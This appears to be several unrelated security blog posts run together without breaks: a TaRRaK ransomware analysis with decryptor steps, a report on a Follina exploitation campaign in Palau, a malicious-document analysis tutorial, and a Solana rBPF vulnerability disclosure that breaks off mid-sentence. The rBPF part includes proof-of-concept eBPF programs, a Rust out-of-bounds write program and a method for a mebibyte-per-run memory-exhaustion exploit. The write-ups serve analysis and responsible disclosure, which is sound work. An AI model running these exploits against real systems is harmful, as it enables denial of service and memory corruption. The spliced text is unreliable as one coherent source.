The TaRRaK ransomware appeared in June of 2021. This ransomware contains many coding errors, so we decided to publish a small blog about them. Samples of this ransomware were spotted in our user base, so we also created a decryptor for this ransomware.
The ransomware is written in .NET. The binary is very clean and contains no protections or obfuscations. When executed, the sample creates a mutex named TaRRaK in order to ensure that only one instance of the malware is executed. Also, an auto-start registry entry is created in order to execute the ransomware on every user login:
The ransomware contains a list of 178 file types (extensions) that, when found, are encrypted:
3ds 7z 7zip acc accdb ai aif apk asc asm asf asp aspx avi backup bak bat bin bmp c cdr cer cfg cmd cpp crt crw cs csproj css csv cue db db3 dbf dcr dds der dmg dng doc docm docx dotx dwg dxf dxg eps epub erf flac flv gif gpg h html ico img iso java jpe jpeg jpg js json kdc key kml kmz litesql log lua m3u m4a m4u m4v max mdb mdf mef mid mkv mov mp3 mp4 mpa mpeg mpg mrw nef nrw obj odb odc odm odp ods odt orf p12 p7b p7c part pdb pdd pdf pef pem pfx php plist png ppt pptm pptx ps ps1 psd pst ptx pub pri py pyc r3d raf rar raw rb rm rtf rwl sav sh sln suo sql sqlite sqlite3 sqlitedb sr2 srf srt srw svg swf tga thm tif tiff tmp torrent txt vbs vcf vlf vmx vmdk vdi vob wav wma wmi wmv wpd wps x3f xlk xlm xls xlsb xlsm xlsx xml zip
The ransomware avoids folders containing one of the following strings:
All Users\Microsoft\
$Recycle.Bin
:\Windows
\Program Files
Temporary Internet Files
\Local\Microsoft\
:\ProgramData\
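The selection rules above (a list of target extensions plus a list of excluded folder fragments) can be sketched in a few lines of Python. This is only an illustration: the extension set is shortened, the function name is hypothetical, and the case-insensitive matching is an assumption that the sample may not share.

```python
from pathlib import PureWindowsPath

# Subset of the 178 targeted extensions listed above (shortened for the example).
TARGET_EXTENSIONS = {"doc", "docx", "jpg", "pdf", "sql", "txt", "xlsx", "zip"}

# Folder fragments the ransomware skips, as listed above.
EXCLUDED_FRAGMENTS = [
    "All Users\\Microsoft\\",
    "$Recycle.Bin",
    ":\\Windows",
    "\\Program Files",
    "Temporary Internet Files",
    "\\Local\\Microsoft\\",
    ":\\ProgramData\\",
]


def would_be_targeted(path: str) -> bool:
    """Return True if a path matches the selection rules described above.

    Assumption: both checks are case-insensitive; the sample may differ.
    """
    lowered = path.lower()
    if any(fragment.lower() in lowered for fragment in EXCLUDED_FRAGMENTS):
        return False
    extension = PureWindowsPath(path).suffix.lstrip(".").lower()
    return extension in TARGET_EXTENSIONS
```

A check like this is handy when estimating which files on a machine were at risk before running the decryptor.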
Encrypted files are given a new extension .TaRRaK. They also contain the TaRRaK signature at the beginning of the encrypted file:
File Encryption
The implementation of the encryption is a nice example of buggy code:
First, the ransomware attempts to read the entire file into memory using File.ReadAllBytes(). This function has an internal limit: a maximum of 2 GB of data can be loaded. If the file is larger, the function throws an exception, which is then handled by the try-catch block. Unfortunately, the try-catch block only handles a permission-denied condition: it adds an ACL entry granting full access to everyone and retries the read operation. In case of any other error (read failure, sharing violation, out of memory, read from an offline file), the exception is raised again and the ransomware is stuck in an infinite loop.
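The control flow described above can be modelled with a small Python sketch. The callables `read_file` and `grant_full_access` are hypothetical stand-ins for File.ReadAllBytes() and the ACL change, and `max_attempts` exists only so that the demonstration terminates; the behaviour described above has no such limit.

```python
def read_with_flawed_retry(read_file, grant_full_access, max_attempts=5):
    """Model of the retry logic described above (illustrative only)."""
    attempts = 0
    while attempts < max_attempts:
        attempts += 1
        try:
            return read_file(), attempts
        except Exception:
            # The flaw: every failure is treated as "permission denied".
            grant_full_access()
            # The read is then retried, even if the real cause was the file size.
    return None, attempts


def too_large():
    # Stand-in for a file above the 2 GB limit: it fails on every attempt.
    raise OSError("file too large to load into one array")


data, attempts = read_with_flawed_retry(too_large, lambda: None)
print(data, attempts)
```

Because granting access never fixes a size or sharing problem, the loop can only end through the artificial attempt limit added for this demonstration.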
Even if the data load operation succeeds and the file data can be fit in memory, there’s another catch. The Encrypt function converts the array of bytes to an array of 32-bit integers:
So it allocates another block of memory with the same size as the file. It then performs the encryption operation, using a custom encryption algorithm. The encrypted UInt32 array is converted to another array of bytes and written to the file. So in addition to the memory allocated for the original file data, two extra blocks are allocated. If any of the memory allocations fails, an exception is thrown and the ransomware is again stuck in an infinite loop.
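To make the three buffers concrete, here is a minimal Python sketch of the same data flow: bytes in, 32-bit integers in the middle, bytes out. The XOR step is a placeholder and is not TaRRaK's algorithm; the zero padding to a multiple of four bytes and both function names are assumptions made for the example.

```python
import struct


def encrypt_like_described(data: bytes, key: int = 0xA5A5A5A5) -> bytes:
    # Buffer 1: `data`, the whole file held in memory.
    padded = data + b"\x00" * (-len(data) % 4)  # assumption: pad to a multiple of 4
    count = len(padded) // 4
    # Buffer 2: the same content as 32-bit little-endian integers.
    words = struct.unpack(f"<{count}I", padded)
    # Placeholder transformation, NOT TaRRaK's algorithm.
    transformed = [word ^ key for word in words]
    # Buffer 3: the integers converted back to bytes for writing.
    return struct.pack(f"<{count}I", *transformed)


def estimated_peak_bytes(file_size: int) -> int:
    # Original bytes + UInt32 array + output bytes, each about the file size.
    return 3 * file_size
```

By this estimate, a file close to the 2 GB limit would need roughly 6 GB of memory before a single byte is written back.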
In the rare case when the encryption process finishes (no sharing violation or another error), the ransom note file named Encrypted Files by TaRRaK.txt is dropped to the root folder of each drive:
Files with the .TaRRaK extension are associated with their own icon:
Finally, desktop wallpaper is set to the following bitmap:
How to use the Avast decryptor to decrypt files encrypted by TaRRaK Ransomware
To decrypt your files, follow these steps:
You must be logged in to the same user account under which the files were encrypted.
Download the free Avast decryptor for 32-bit or 64-bit Windows.
Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information if you want, but you really only need to click “Next”.
On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
On the final page, you can opt in to back up encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.
Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.
Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.
Key Observations
This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.
Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.
First stage
The compromised website, as pictured in the screenshot below, was used to host an executable disguised as “robots.txt”. We believe the name was chosen so that the file would not stand out if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this “robots.txt” file was downloaded, saved as Sihost.exe, and then executed.
Second Stage, Sihost.exe
When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe it downloaded the second stage of the attack which was a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.
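For defenders who want to check a suspicious file against the loader hash given above, a minimal Python sketch follows. The function names are illustrative; the only value taken from this report is the SHA-256 hash itself.

```python
import hashlib

# SHA-256 of the second-stage loader, as given above.
LOADER_SHA256 = "b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447"


def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_loader(path: str) -> bool:
    """Return True if the file's SHA-256 equals the loader hash above."""
    return sha256_of_file(path) == LOADER_SHA256
```

A match is strong evidence of this specific loader; a mismatch proves little, since the attacker can rebuild the binary at any time.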
Third stage, favicon.svg
After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx.lnk, which are then executed on the victims’ machine.
Fourth Stage, Sevntx64.exe and Sevntx64.lnk
When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.
The screenshot below shows the executable loading the shellcode.
Final Stage, AsyncRat
When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443.
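The server name appears in this report in defanged form, with `[.]` in place of some or all dots. When feeding such indicators into log searches or blocklists, they first need to be normalised. The helpers below are a small sketch of that step; the function names are illustrative.

```python
def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'example[.]com' back into 'example.com'."""
    return indicator.replace("[.]", ".")


def defang(indicator: str) -> str:
    """Defang an indicator so it cannot be clicked or resolved by accident."""
    return indicator.replace(".", "[.]")


# Both spellings used in this report normalise to the same host name.
print(refang("palau[.]voipstelecom[.]com[.]au"))
print(refang("palau.voipstelecom.com[.]au"))
```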
We highly recommend Avast Software to protect against the latest threats, and Microsoft patches to protect your Windows systems from the latest CVE-2022-30190 vulnerability.
I returned to write the second article of Malware Analysis Series (MAS) last January/08 after receiving outstanding support from a high-profile professional and company in the industry, but while the article is not ready (I am working on page 43 and far from the end), I spent a couple of hours writing a simple and short article on malicious document analysis. I hope it helps someone.
While the first article of MAS (Malware Analysis Series) is not ready, I’m leaving here a very simple case of malicious document analysis for helping my Twitter followers and any professional interested in learning how to analyze this kind of artifact.
Before starting the analysis, I’m going to use the following environment and tools:
All three tools above are usually installed on REMnux by default. However, if you are using Ubuntu or any other Linux distribution, you can install them through the links and commands above.
Like any common binary, we can analyze any maldoc using static or dynamic analysis. My preferred approach is always the former, so let’s take it.
We’ll be analyzing the following sample: 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc
Downloading sample and gathering information
The first step is getting general information about this hash by using any well-known endpoint such as Virus Total, Hybrid Analysis, Triage, Malware Bazaar and so on. Therefore, let’s use Malwoverview to do it on the command line and collect information from Malware Bazaar that, fortunately, also brings information from excellent Triage:
Given the output above, we can reasonably assume that the dropped executable comes from the maldoc itself, because Microsoft Office “loads VBA resource, possible macro or embedded object present“. Furthermore, the maldoc seems to elevate privileges (AdjustPrivilege( )), intercept events by installing a hook procedure into a hook chain (SetWindowsHookEx( )), and possibly perform code injection (WriteProcessMemory( )), so it’s reasonable to assume these Triage signatures are associated with an embedded executable. Therefore, it’s time to download the malicious document from Triage (you can do it from the https://tria.ge/dashboard website, if you wish):
From both previous outputs, important facts come up:
Some code is executed when the MS Word is executed.
A file seems to be written to the file system.
The maldoc seems to open a file (probably the same written above).
VBA macros are responsible for the entire activity.
The next step is to analyze the maldoc, which is an OLE document. We are going to use oledump.py (from Didier Stevens’s suite, @DidierStevens) to check the OLE’s internals and try to understand what’s happening:
According to the figure above we have:
three macros in 16, 17 and 18.
a big “content” in 11, which could be one of the “VBA resources” mentioned in Triage’s output.
Once again, we can decide to use dynamic analysis (a debugger) or static analysis to expose the real threat hidden inside this malicious document, but let’s proceed with static analysis because it will bring more details while addressing the problem.
In the next step we need to check the macros’ content by uncompressing their contents (-v option) using oledump.py:
remnux@remnux:~/articles$ oledump.py -s 16 -v 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx | more
There are a few details that can be observed from the output above:
Obviously the code is obfuscated.
The Split function, which returns a zero-based and one-dimensional array containing substrings, manipulates the content from UserForm1 (object 11) and, apparently, this content is divided in four parts (TextBox1, TextBox2, TextBox3 and TextBox4). In addition, the UserForm1 content seems to be separated by “!” character.
UserForm2 is also being used (TextBox1 and TextBox2) in a MoveFile operation.
The Winmgmt service, which is a WMI service operating inside the svchost process under LocalSystem account, is being used to execute an operation given by UserForm2.TextBox5.
The UserForm2.Text6 is used to create a reference to an object provided by ActiveX.
The UserForm2.Text7 is being used to save some content as a binary file.
Therefore we must investigate the content of object 15 (Macros/UserForm2/o):
Analyzing the image above (check SaveBinaryData() function) and previous figures, it’s reasonable to assume that an executable, which we don’t know yet, will be saved as “winword.com“ and later it will be renamed to “winword.exe“ within C:\Users\Public\Pictures\ directory. Finally, the binary will be executed by calling objProcess.create() function.
At this point, we should verify the content of object 11 (check “Macros/UserForm1/o“) because it likely contains our “hidden” executable. Thus, run the following command:
remnux@remnux:~/articles$ oledump.py 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d | more
As we expected and mentioned previously, these decimal numbers are separated by “!” character.
Additionally, there’s a catch: according to last figure, this object has 4 parts (UserForm1.Text1, UserForm1.Text2, UserForm1.Text3 and UserForm1.Text4), so we should dump it into a file (dump1), edit and “join” all parts.
To dump “object 11” into a file (named dump1), execute the following command:
Editing the file using “vi” command or any other editor.
Using “$” to go to the end of each line.
Removing occurrences of “Tahoma” word and any garbage (easily identified) from the text.
Join this line with the next one (“J” command on “vi“)
After editing the dump1 file, we have to replace all “!” characters with commas and transform all decimal numbers into hex bytes. First, replace all “!” characters with commas using a simple “sed” command:
remnux@remnux:~/articles$ sed -e 's/!/,/g' dump1 > dump3
remnux@remnux:~/articles$ cat dump3 | more
From this point, we have to process and transform this file (dump3) into something useful, and we have two clear options:
We can use CyberChef to decode the dump3 file.
We can write Python 3 code to statically decode the dump3 file into a possible executable.
I’m going to show you both methods, though I always prefer programming a small script. Please, pay attention to the fact that all decimal numbers are separated by comma, so it will demand an extra concern during the decoding operation.
To decode this file on CyberChef you have to:
Load it onto CyberChef’s input pane. There’s a button on the top-right to do it.
Pick up “From Decimal” operation and configure the delimiter to “Comma”.
Afterwards, you’ll see an executable in the Output pane, which can be saved onto file system.
After saving the file from the Output pane, check its type:
remnux@remnux:~/Downloads$ file download.dat
download.dat: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
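The same sanity check can be done without the file utility. The sketch below only verifies the two best-known markers of a PE file: the “MZ” magic at offset 0 and the “PE\0\0” signature at the offset stored at 0x3C. It is a quick plausibility test under those assumptions, not a full parser, and the function name is illustrative.

```python
import struct


def looks_like_pe(data: bytes) -> bool:
    """Return True if the buffer starts with a plausible DOS and PE header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    # e_lfanew: 4-byte little-endian offset of the PE signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"
```

It can be applied to the decoded bytes directly, before anything is written to disk.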
Excellent! Let’s now write a simple Python script named python_convert.py to perform the same operation and get the same result:
final_file.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
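The script itself is not reproduced in this text, so here is a minimal sketch of what such a decoder could look like. It assumes that dump3 contains only decimal byte values (0 to 255) separated by commas, as prepared in the previous steps; the function names and the tolerance for leftover “!” separators are my own choices for the example.

```python
def decode_decimal_dump(text: str) -> bytes:
    """Convert comma-separated decimal numbers into raw bytes."""
    values = []
    for token in text.replace("!", ",").split(","):
        token = token.strip()
        if not token:
            continue  # tolerate trailing separators and blank lines
        values.append(int(token))
    return bytes(values)  # raises ValueError if a value is outside 0..255


def convert_file(source: str = "dump3", target: str = "final_file.bin") -> int:
    """Decode `source` and write the result to `target`; return the byte count."""
    with open(source, "r", encoding="ascii") as handle:
        payload = decode_decimal_dump(handle.read())
    with open(target, "wb") as handle:
        handle.write(payload)
    return len(payload)
```

Calling convert_file() in the directory that holds dump3 would produce final_file.bin, which can then be checked with the file command as before.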
As we expected, it worked! Finally, let’s check the final binary on Virus Total and Triage to learn a bit more about the extracted binary (next figures):
It would be super easy to extract the same malware from the maldoc by using dynamic analysis. You’ll find out that a password is protecting the VBA Project, but it is quite trivial to remove this kind of protection:
That’s it! I hope you have learned something new from this article, and see you in the next one.
“Long is the way and hard, that out of hell leads up to light.”
(by John Milton from Paradise Lost — 1667)
My name is Alexandre Borges and I’m a security researcher focused on reverse engineering, exploit development and programming. Therefore, I’ll try to keep this blog updated and include write-ups about these topics.
Honestly, I hope you can learn something from my posts.
Please feel free to contact me and comment on any mistakes or inaccuracies.
Below are the writeups for two vulnerabilities I discovered in
Solana rBPF, a self-described
“Rust virtual machine and JIT compiler for eBPF programs”. These
vulnerabilities were responsibly disclosed according to Solana’s
Security Policy
and I have permission from the engineers and from the Solana Head of
Business Development to publish these vulnerabilities as shown below.
In part 1, I discussed the
development of the fuzzers. Here, I will discuss the vulnerabilities
as I discovered them and the process of reporting them to Solana.
Bug 1: Resource exhaustion
The first bug I reported to Solana was exceptionally tricky; it only
occurs in highly specific circumstances, and the fact that the
fuzzer discovered it at all is a testament to the incredible
complexity of inputs a fuzzer can discover through repeated trials.
The relevant crash was found within approximately two hours of
starting the fuzzer.
Initial Investigation
The input that triggered the crash disassembles to the following
assembly:
For whatever reason, this particular set of instructions causes
a memory leak.
When executed, this program does the following steps, roughly:
increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal
to 8355838
this, in tandem with the first step, will cause the loop to
execute 32767 times (a total of 65534 instructions)
set r9 to r3 * 2^3, which is going to be zero because r3 starts at
zero
calls a nonexistent function
the nonexistent function should trigger an unknown symbol
error
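The loop in the first two steps is easy to check by simulation. The sketch below models only the add and the conditional backward jump as described above; it is not rBPF, and the function name is illustrative.

```python
def simulate_loop(step: int = 255, limit: int = 8355838):
    """Simulate `r0 += step; jump back while r0 <= limit` and count the work."""
    r0 = 0
    executed = 0      # instructions executed by the two-instruction loop
    jumps_taken = 0   # how often the backward jump is actually taken
    while True:
        r0 += step        # the add instruction
        executed += 1
        executed += 1     # the conditional jump is executed as well
        if r0 <= limit:   # jump back while r0 <= 8355838
            jumps_taken += 1
            continue
        break
    return r0, executed, jumps_taken
```

Under this model the backward jump is taken 32767 times and the loop accounts for roughly 65,000 executed instructions, in line with the rough count above; the exact total depends on how the first and last iterations are counted. It also shows why the constants matter: a small change to either one shifts the point at which the instruction meter runs out.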
What stood out to me about this particular test case is how
incredibly specific it was; varying the addition of 255 or 8355838 by
even a small amount caused the leak to disappear. It was then I
remembered the following line from my fuzzer:
remaining, here, refers to the number of instructions remaining
before the program is forcibly terminated. As a result, the leaking
program was running out of this meter at exactly the call instruction.
A faulty optimisation
There is a wall of text at line 420 of jit.rs
which suitably describes an optimisation that Solana applied in order
to reduce the frequency at which they need to update the instruction
meter.
The short version is that they only update or check the instruction
meter when they reach the end of a block or a call in order to reduce
the number of times they update and check the meter. This optimisation
is totally reasonable; we don’t care if we run out of instructions at
the middle of a block because the subsequent instructions are still
“safe”, and if we ever hit an exit that’s the end of a block anyway.
In other words, this optimisation should have no effect on the final
state of the program.
The issue can be seen in the patch for the vulnerability,
where the maintainer moved line 1279 to line 1275. To understand why
that’s relevant, let’s walk through our execution again:
increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal
to 8355838
this, in tandem with the first step, will cause the loop to
execute 32767 times (a total of 65534 instructions)
our meter updates here
set r9 to r3 * 2^3, which is going to be zero because r3 starts at
zero
calls a nonexistent function
the nonexistent function should trigger an unknown symbol
error, but that doesn’t happen because our meter updates here
and emits a max instructions exceeded error
However, based on the original order of the instructions, what happens
in the call is the following:
invoke the call, which fails because the symbol is unresolved
to report the unresolved symbol, we invoke the
report_unresolved_symbol
function, which returns the name of the symbol invoked (or
“Unknown”) in a heap-allocated string
the pc is updated
the instruction count is validated, which overwrites the
unresolved symbol error and terminates execution
Because the unresolved symbol error is merely overwritten, the value
is never passed to the Rust code which invoked the JIT program. As a
result, the reference to the heap-allocated String is lost and never
dropped. Thus: any pointer to that heap allocation is lost and will
never be freed, leading to the leak.
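The ordering problem can be modelled in a few lines of Python. This is a toy model, not rBPF code: `ToyHeap` stands in for the allocator, `run_call` for the JIT-emitted call sequence, and the `check_meter_first` flag for the difference between the original and the patched instruction order. All names are hypothetical.

```python
class ToyHeap:
    """Tracks allocations that were made but never released (toy model)."""

    def __init__(self):
        self.live = {}
        self._next_id = 0

    def allocate(self, payload: str) -> int:
        handle = self._next_id
        self._next_id += 1
        self.live[handle] = payload
        return handle

    def release(self, handle: int) -> None:
        del self.live[handle]


def run_call(heap, meter_remaining, check_meter_first, symbol="Unknown"):
    """Model one call to an unresolved symbol; return (error name, handle)."""
    if check_meter_first and meter_remaining <= 0:
        return ("ExceededMaxInstructions", None)
    handle = heap.allocate(symbol)  # the string built for the unresolved symbol
    error = ("UnresolvedSymbol", handle)
    if not check_meter_first and meter_remaining <= 0:
        # The meter check overwrites the earlier error; the handle is forgotten.
        error = ("ExceededMaxInstructions", None)
    return error


def host_handles(heap, error):
    """The host frees the string only if the error that reaches it carries one."""
    _, handle = error
    if handle is not None:
        heap.release(handle)


def leaked_bytes(heap) -> int:
    return sum(len(payload) for payload in heap.live.values())
```

Running the original order three times with an exhausted meter leaves three seven-character strings behind, while the patched order never allocates them in the first place.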
That being said, the leak is only seven bytes per execution of the
program. Without causing a larger leak, this isn’t particularly
exploitable.
Note how the name is the string which becomes heap allocated. The
value of the name is determined by a relocation lookup in the ELF, which
we can actually control if we compile our own malicious ELF. Even though
the fuzzer only tests the JIT operations, one of the intended ways to
load a BPF program is as an ELF,
so it seems like something that would certainly be in scope.
Crafting the malicious ELF
To create an unresolved relocation in BPF, it’s actually quite simple.
We just need to create a function with a very, very long name that isn’t
actually defined, only declared. To do so, I created two files to craft
the malicious ELF:
evil.h
evil.h is far too large to post here, as it has a function name that
is approximately a mebibyte long. Instead, it was generated with the
following bash command.
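The original bash command is not reproduced in this text. As a hedged stand-in, the Python sketch below generates a header that declares, but does not define, a function with a name of about one mebibyte. The fill character, the `void name(void);` signature and the function names are assumptions; the real evil.h may look different.

```python
def make_header(name_length: int = 1 << 20, fill: str = "a") -> str:
    """Build a C declaration for a function with a very long, undefined name."""
    name = fill * name_length  # hypothetical name: one repeated character
    return f"void {name}(void);\n"


def write_header(path: str = "evil.h", name_length: int = 1 << 20) -> None:
    """Write the generated declaration to `path`."""
    with open(path, "w", encoding="ascii") as handle:
        handle.write(make_header(name_length))
```

Because the function is only declared, the compiled object keeps a relocation entry for the name, which is exactly the string the unresolved-symbol report later copies to the heap.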
Note that goto +0 is used here because we’ll use a specialised
instruction meter that only allows two instructions.
Finally, we’ll also make a Rust program to load and execute this ELF
just to make sure the maintainers are able to replicate the issue.
elf-memleak.rs
You won’t be able to use this particular example anymore as rBPF has
changed a lot of its API since the time this was created. However,
you can check out version v0.2.21,
which this exploit was crafted for.
Note in particular the use of an instruction meter with two remaining.
With our malicious ELF that has a function name that’s a mebibyte
long, the report_unresolved_symbol will set that name variable
to the long function name. As a result, the allocated string will
leak a whole mebibyte of memory per execution rather than the
measly seven bytes. When performed in this loop, the entire system’s
memory will be exhausted in mere moments.
Reporting
Okay, so now that we’ve crafted the exploit, we should probably
report it to the vendor.
A quick Google later and we find the Solana security policy.
Scrolling through, it says:
DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.
Okay, reasonable enough. Looks like they have bug bounties too!
DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)
Woah. I was working on rBPF out of curiosity, but it seems that
there’s quite a bounty made available here.
I sent in my bug report via email on January 31st, and, within just
three hours, Solana acknowledged the bug. Below is the report as
submitted to Solana:
Report for bug 1 as submitted to Solana
There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.
The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.
The following eBPF program demonstrates the vulnerability:
entrypoint:
  goto +0
  r0 = 0
  call -1
where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.
The optimisation used in jit.rs to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.
While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.
Attached is a Rust file (elf-memleak.rs) which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.
Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.
For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).
Solana classified this bug as a Denial-of-Service (Non-RPC) and
awarded $100k.
Bug 2: Persistent .rodata corruption
The second bug I reported was easy to find, but difficult to diagnose.
While the bug occurred with high frequency, it was unclear
what exactly caused the bug. Past that, was it even exploitable
or useful?
Initial Investigation
The input that triggered the crash disassembles to the following
assembly:
entrypoint:
  or32 r9, -1
  mov32 r1, -1
  stxh [r9+0x1], r0
  exit
The crash type triggered was a difference in JIT vs interpreter exit
state; JIT terminated with Ok(0), whereas interpreter terminated
with:
Spicy stuff. Looks like our JIT implementation has some form of
out-of-bounds write. Let’s investigate a bit further.
The first thing of note is the access violation’s address:
4294967296. In other words, 0x100000000. Looking at the Solana
documentation,
we see that this address corresponds to program code. Are we
writing to JIT’d code??
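The mapping from address to region can be written down as a tiny lookup. The region bases follow the memory map in the Solana documentation; treating each region as the 4 GiB window that starts at its base is a simplifying assumption for this sketch, and the function name is illustrative.

```python
# Region bases from the Solana memory map; the labels are descriptive only.
REGIONS = {
    0x1: "program code",
    0x2: "stack",
    0x3: "heap",
    0x4: "input parameters",
}


def region_of(address: int) -> str:
    """Name the region an address falls into (assumes 4 GiB windows)."""
    return REGIONS.get(address >> 32, "unmapped")


print(hex(4294967296), region_of(4294967296))
```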
The answer, dear reader, is unfortunately no. As exciting as the
prospect of arbitrary code execution might be, this actually refers
to the BPF program code – more specifically, it refers to the
read-only data present in the ELF provided. Regardless, it is
writing to an immutable reference to a Vec somewhere that represents
the program code, which is supposed to be read-only.
So why isn’t it?
The curse of x86
Let’s make our payload more clear and execute directly, then pop
it into gdb to see exactly what code the JIT compiler is
generating. I used the following program to test for OOB write:
oob-write.rs
This code likely no longer works due to changes in the API of
rBPF in recent releases. Try it in examples/ in v0.2.22,
where the vulnerability is still present.
use std::collections::BTreeMap;

use solana_rbpf::{
    elf::Executable,
    insn_builder::{Arch, BpfCode, Instruction, IntoBytes, MemSize, Source},
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();
}

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    code.load(MemSize::DoubleWord)
        .set_dst(9)
        .push()
        .load(MemSize::Word)
        .set_imm(1)
        .push()
        .store_x(MemSize::HalfWord)
        .set_dst(9)
        .set_off(0)
        .set_src(0)
        .push()
        .exit()
        .push();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    dump_insns(&executable);
    let mut jit_vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);
    }
}
This just sets up and executes the following BPF assembly:
entrypoint:
  lddw r9, 0x100000000
  stxh [r9+0x0], r0
  exit
This assembly simply writes a 0 to 0x100000000.
For the next part: please, for the love of god, use GEF.
$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤ break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤ run
gef➤ print self.executable.ro_section.buf.ptr.pointer
gef➤ awatch *$1 # break if we modify the readonly section
gef➤ record full # set up for reverse execution
gef➤ continue
After that last continue, we effectively execute until we hit the
write access to our read-only section. Additionally, we can step
backwards in the program until we find our faulty behaviour.
The watched memory is written to as a result of this x86 store
instruction
(as a reminder, this is the branch for stxh). Seeing this
